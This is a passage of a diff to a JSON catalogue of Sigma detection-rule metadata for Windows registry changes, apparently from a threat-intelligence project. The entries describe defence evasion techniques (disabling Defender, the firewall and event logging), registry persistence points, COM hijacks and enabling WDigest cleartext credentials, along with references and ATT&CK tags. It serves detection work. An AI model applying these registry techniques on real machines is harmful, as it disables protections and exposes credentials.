"Ján Trenčanský, frack113", - "creation_date": "2020/07/28", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/15", "falsepositive": [ "Administrator actions" ], - "filename": "win_defender_disabled.yml", - "level": "low", - "logsource.category": "No established category", + "filename": "registry_set_enabling_turnoffcheck.yml", + "level": "medium", + "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml" + "https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml" ], "tags": [ "attack.defense_evasion", "attack.t1562.001" ] }, - "uuid": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "value": "Windows Defender Threat Detection Disabled" + "uuid": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "value": "Scripted Diagnostics Turn Off Check Enabled - Registry" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", + "level": "medium", + "logsource.category": "registry_set", + 
"logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" + ] + }, + "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "value": "Session Manager Autorun Keys Modification" + }, + { + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "This value is not set by default but could be rarly used by administrators" + ], + "filename": "registry_set_hangs_debugger_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://persistence-info.github.io/Data/wer_debugger.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", + "value": "Add Debugger Entry To Hangs Key For Persistence" + }, + { + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "meta": { + "author": "Omkar Gudhate", + "creation_date": "2020/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_comhijack_sdclt.yml", + "level": "high", + "logsource.category": "registry_set", + 
"logsource.product": "windows", + "refs": [ + "http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass", + "https://www.exploit-db.com/exploits/47696", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" + ] + }, + "uuid": "07743f65-7ec9-404a-a519-913db7118a8d", + "value": "COM Hijack via Sdclt" + }, + { + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_winlogon_notify_key.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "value": "Winlogon Notify Key Logon Persistence" + }, + { + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "meta": { + "author": "frack113", + "creation_date": "2022/01/24", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_blackbyte_ransomware.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "83314318-052a-4c90-a1ad-660ece38d276", + "value": "Blackbyte Ransomware Registry" + }, + { + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/22", + "falsepositive": [ + "Valid Macros and/or internal documents" + ], + "filename": "registry_set_office_security.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://twitter.com/inversecos/status/1494174785621819397", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "value": "Office Security Settings Changed" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nWe can also catch this by system log 7045 (https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_cobaltstrike_service_installs.yml)\nIn some SIEM you can catch those events also in HKLM\\System\\ControlSet001\\Services or HKLM\\System\\ControlSet002\\Services, however, this rule is based on a 
regular sysmon's events.\n",
+ "meta": {
+ "author": "Wojciech Lesicki",
+ "creation_date": "2021/06/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_cobaltstrike_service_installs.yml",
+ "level": "critical",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.privilege_escalation",
+ "attack.lateral_movement",
+ "attack.t1021.002",
+ "attack.t1543.003",
+ "attack.t1569.002"
+ ]
+ },
+ "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130",
+ "value": "CobaltStrike Service Installations in Registry"
+ },
+ {
+ "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/12/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_chrome_extension.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1133"
+ ]
+ },
+ "uuid": "b64a026b-8deb-4c1d-92fd-98893209dff1",
+ "value": "Running Chrome VPN Extensions via the Registry 2 VPN Extension"
+ },
+ {
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
+ "meta": {
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
+ "creation_date": "2019/10/25",
+ 
"falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb",
+ "value": "Wow6432Node CurrentVersion Autorun Keys Modification"
+ },
+ {
+ "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2019/10/12",
+ "falsepositive": [
+ "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)"
+ ],
+ "filename": "registry_set_susp_keyboard_layout_load.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files",
+ "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1588.002"
+ ]
+ },
+ "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8",
+ "value": "Suspicious Keyboard Layout Load"
+ },
+ {
+ "description": "Detects disabling Windows Defender Tamper Protection",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "93d298a1-d28f-47f1-a468-d971e7796679",
+ "value": "Disable Tamper Protection on Windows Defender"
+ },
+ {
+ "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.",
+ "meta": {
+ "author": "Bhabesh Raj",
+ "creation_date": 
"2021/01/10",
+ "falsepositive": [
+ "Legitimate Addin Installation"
+ ],
+ "filename": "registry_set_office_vsto_persistence.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://vanmieghem.io/stealth-outlook-persistence/",
+ "https://twitter.com/_vivami/status/1347925307643355138",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml"
+ ],
+ "tags": [
+ "attack.t1137.006",
+ "attack.persistence"
+ ]
+ },
+ "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685",
+ "value": "Stealthy VSTO Persistence"
+ },
+ {
+ "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials",
+ "meta": {
+ "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
+ "creation_date": "2019/09/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_wdigest_enable_uselogoncredential.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
+ "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc",
+ "value": "Wdigest Enable UseLogonCredential"
+ },
+ {
+ "description": "Detect possible persistence using Fax DLL load when service restart",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/07/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": 
"registry_set_fax_dll_persistance.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf",
+ "https://twitter.com/dottor_morte/status/1544652325570191361",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "9e3357ba-09d4-4fbd-a7c5-ad6386314513",
+ "value": "Change the Fax Dll"
+ },
+ {
+ "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/12/09",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_services_etw_tamper.yml",
+ "level": "low",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1112",
+ "attack.t1562"
+ ]
+ },
+ "uuid": "4f281b83-0200-4b34-bf35-d24687ea57c2",
+ "value": "ETW Logging Disabled For SCM"
+ },
+ {
+ "description": "Detects disabling Windows Defender PUA protection",
+ "meta": {
+ "author": "Austin Songer @austinsonger",
+ "creation_date": "2021/08/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "8ffc5407-52e3-478f-9596-0a7371eafe13",
+ "value": "Disable PUA Protection on Windows Defender"
+ },
+ {
+ "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/07/21",
+ "falsepositive": [
+ "Legitimate SIP being registered by the OS or different software."
+ ],
+ "filename": "registry_set_sip_persistence.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://persistence-info.github.io/Data/codesigning.html",
+ "https://github.com/gtworek/PSBits/tree/master/SIP",
+ "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.t1553.003"
+ ]
+ },
+ "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1",
+ "value": "Persistence Via New SIP Provider"
+ },
+ {
+ "description": "Detects modification of autostart extensibility point (ASEP) in registry.",
+ "meta": {
+ "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)",
+ "creation_date": "2019/10/25",
+ "falsepositive": [
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason",
+ "Legitimate administrator sets up autorun keys for legitimate reason"
+ ],
+ "filename": "registry_set_asep_reg_keys_modification_classes.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "9df5f547-c86a-433e-b533-f2794357e242",
+ "value": "Classes Autorun Keys Modification"
+ },
+ {
+ "description": "Detects the manipulation of persistent URLs which could execute malicious code",
+ "meta": {
+ "author": "Tobias Michalski",
+ "creation_date": "2021/06/10",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_outlook_registry_todaypage.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1",
+ "value": "Persistent Outlook Landing Today Pages"
+ },
+ {
+ "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/09",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_disable_defender_firewall.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry",
+ 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.004"
+ ]
+ },
+ "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f",
+ "value": "Disable Microsoft Defender Firewall via Registry"
+ },
+ {
+ "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/08/07",
+ "falsepositive": [
+ "Legitimate use of the key to setup a debugger. Which is often the case on developers machines"
+ ],
+ "filename": "registry_set_dbgmanageddebugger_persistence.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/",
+ "https://github.com/last-byte/PersistenceSniper",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1574"
+ ]
+ },
+ "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b",
+ "value": "Potential Registry Persistence Attempt Via DbgManagedDebugger"
+ },
+ {
+ "description": "Detects registry modifications that disable Privacy Settings Experience",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/10/02",
+ "falsepositive": [
+ "Legitimate admin script"
+ ],
+ "filename": "registry_set_disable_privacy_settings_experience.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b",
+ "value": "Disable Privacy Settings Experience in Registry"
+ },
+ {
+ "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/24",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "registry_set_renamed_sysinternals_eula_accepted.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "Internal Research",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml"
+ ],
+ "tags": [
+ "attack.resource_development",
+ "attack.t1588.002"
+ ]
+ },
+ "uuid": "8023f872-3f1d-4301-a384-801889917ab4",
+ "value": "Usage of Renamed Sysinternals Tools - RegistrySet"
+ },
+ {
+ "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/08/28",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "filename": "registry_set_treatas_persistence.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md",
+ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546.015"
+ ]
+ },
+ "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82",
+ "value": "COM Hijacking via TreatAs"
+ },
+ {
+ "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.",
+ "meta": {
+ "author": "Andreas Hunkeler (@Karneades)",
+ "creation_date": "2021/11/19",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_file_association_exefile.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/mrd0x/status/1461041276514623491",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff",
+ "value": "New File Association Using Exefile"
+ },
+ {
+ "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali",
+ "creation_date": "2022/07/04",
+ "falsepositive": [
+ "Legitimate administrators disabling specific event log for troubleshooting"
+ ],
+ "filename": "registry_set_disable_winevt_logging.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/WhichbufferArda/status/1543900539280293889",
+ "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.002"
+ ]
+ },
+ "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3",
+ "value": "Disable Winevt Event Logging Via Registry"
+ },
+ {
+ "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/10",
+ "falsepositive": [
+ "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)"
+ ],
+ "filename": "registry_set_susp_app_paths_persistence.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN",
+ "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1546.012"
+ ]
+ },
+ "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6",
+ "value": "Suspicious Values In App Paths Default Property"
+ },
+ {
+ "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/04/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_add_load_service_in_safe_mode.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network",
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.001"
+ ]
+ },
+ "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec",
+ "value": "Registry Persitence via Service in Safe Mode"
+ },
+ {
+ "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious",
+ "meta": {
+ "author": "Syed Hasan (@syedhasan009)",
+ "creation_date": "2021/06/18",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "registry_set_taskcache_entry.yml",
+ "level": "high",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://labs.f-secure.com/blog/scheduled-task-tampering/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1053",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d",
+ "value": "Scheduled TaskCache Change by Uncommon Program"
+ },
+ {
+ "description": "Adds a RUN key that contains a powershell keyword",
+ "meta": {
+ "author": "frack113, Florian Roth",
+ "creation_date": "2022/03/17",
+ "falsepositive": [
+ "Legitimate admin or third party scripts"
+ ],
+ "filename": "registry_set_powershell_in_run_keys.yml",
+ "level": "medium",
+ "logsource.category": "registry_set",
+ "logsource.product": "windows",
+ "refs": [
+ 
"https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry",
+ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.001"
+ ]
+ },
+ "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c",
